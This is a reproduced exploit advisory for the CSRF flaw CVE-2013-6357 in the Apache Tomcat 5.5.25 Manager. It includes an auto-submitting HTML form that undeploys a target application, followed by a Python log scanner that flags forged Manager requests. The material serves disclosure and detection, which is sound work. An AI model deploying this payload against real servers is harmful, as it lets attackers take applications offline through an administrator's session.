| Title | Published | Views | Family |
|---|---|---|---|
| Apache Tomcat 5.5.25 CSRF Vulnerabilities | 4 Nov 2013 00:00 | – | zdt |
| Security Bulletin: TADDM affected by multiple vulnerabilities due to Apache Tomcat libraries | 26 Mar 2025 03:33 | – | ibm |
| CVE-2013-6357 | 13 Nov 2013 15:00 | – | cve |
| CVE-2013-6357 | 13 Nov 2013 15:00 | – | cvelist |
| Apache Tomcat 5.5.25 - Cross-Site Request Forgery | 4 Nov 2013 00:00 | – | exploitdb |
| Apache Tomcat 5.5.25 - Cross-Site Request Forgery | 4 Nov 2013 00:00 | – | exploitpack |
| CVE-2013-6357 | 13 Nov 2013 15:55 | – | nvd |
| Apache Tomcat <= 5.5.25 CSRF Vulnerability - Linux | 18 Mar 2021 00:00 | – | openvas |
| Apache Tomcat <= 5.5.25 CSRF Vulnerability - Windows | 18 Mar 2021 00:00 | – | openvas |
| Apache Tomcat 5.5.25 Cross Site Request Forgery | 4 Nov 2013 00:00 | – | packetstorm |
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Apache Tomcat 5.5.25 CSRF Vulnerabilities
# Date : 10-24-2013
# Author : Ivano Binetti (http://ivanobinetti.com)
# Author : Gianmarco Pirozzi (http://www.linkedin.com/pub/gianmarco-pirozzi/63/80b/2a5)
# Vendor site : http://tomcat.apache.org/
# Version : Apache Tomcat 5.5.25 and below (other versions could be affected)
# Tested on : Apache Tomcat 5.5.25
# Original Advisory : http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
# CVE-ID : CVE-2013-6357
+---------------------------------------------------------------------------------------------------------------------------------+
Summary
1) Introduction
2) Vulnerability Description
3) Exploit
3.1) Undeploy Applications
+---------------------------------------------------------------------------------------------------------------------------------+
1) Introduction
Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process.
2) Vulnerability Description
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability in the Manager application
(the component used to start/stop/deploy/undeploy applications). Because the Manager accepts these state-changing requests without any anti-CSRF token, an attacker who gets an authenticated Manager user to load a crafted page can perform the following malicious activities:
- stop an existing application
- undeploy an existing application
- deploy a new application
In this advisory I will only demonstrate how to automatically undeploy an existing application.
3) Exploit
3.1 Undeploy Applications
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>
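From the defender's side, a forged undeploy like the one above arrives as a normal authenticated request, so the only visible tell in the server log is the request's origin. The following script is an added example (not part of the advisory) that flags state-changing Manager commands whose Referer is missing or comes from a foreign origin; it assumes the AccessLogValve uses the `combined` pattern (which includes Referer), and the log lines and hostnames are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Tomcat AccessLogValve "combined" pattern (assumed):
# %h %l %u %t "%r" %s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The state-changing Manager commands named in the advisory.
STATE_CHANGING = ("/manager/html/undeploy", "/manager/html/deploy",
                  "/manager/html/stop", "/manager/html/start")


def is_suspicious(line, manager_origin):
    """Return a reason string if the request looks like a cross-site Manager
    command, otherwise None. manager_origin is e.g. 'http://host:8080'."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m.group("target")).path
    if not path.startswith(STATE_CHANGING):
        return None
    referer = m.group("referer")
    if referer in ("", "-"):
        return "state-changing Manager request without Referer"
    r, o = urlsplit(referer), urlsplit(manager_origin)
    if (r.scheme, r.netloc) != (o.scheme, o.netloc):
        return f"state-changing Manager request referred from foreign origin {r.scheme}://{r.netloc}"
    return None


def scan(lines, manager_origin):
    """Return (1-based line number, reason) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        reason = is_suspicious(line, manager_origin)
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample log (hostnames and times are made up).
SAMPLE = [
    '10.0.0.5 - admin [24/Oct/2013:10:00:01 +0000] "GET /manager/html/list HTTP/1.1" 200 4321 "http://tomcat.example:8080/manager/html" "Mozilla/5.0"',
    '10.0.0.5 - admin [24/Oct/2013:10:02:17 +0000] "POST /manager/html/undeploy?path=/shop HTTP/1.1" 200 3100 "http://evil.example/csrf.html" "Mozilla/5.0"',
    '10.0.0.5 - admin [24/Oct/2013:10:03:44 +0000] "POST /manager/html/undeploy?path=/old HTTP/1.1" 200 3100 "http://tomcat.example:8080/manager/html" "Mozilla/5.0"',
    '10.0.0.9 - admin [24/Oct/2013:10:05:00 +0000] "GET /manager/html/stop?path=/shop HTTP/1.1" 200 3000 "-" "curl/7.30"',
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE, "http://tomcat.example:8080"):
        print(f"line {n}: {reason}")
```

A Referer check is a detection heuristic, not a fix: the durable mitigation is the per-session nonce that later Tomcat releases require on Manager commands, plus restricting the Manager to trusted addresses.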
+----------------------------------------------------------------------------------------------------------------------------------+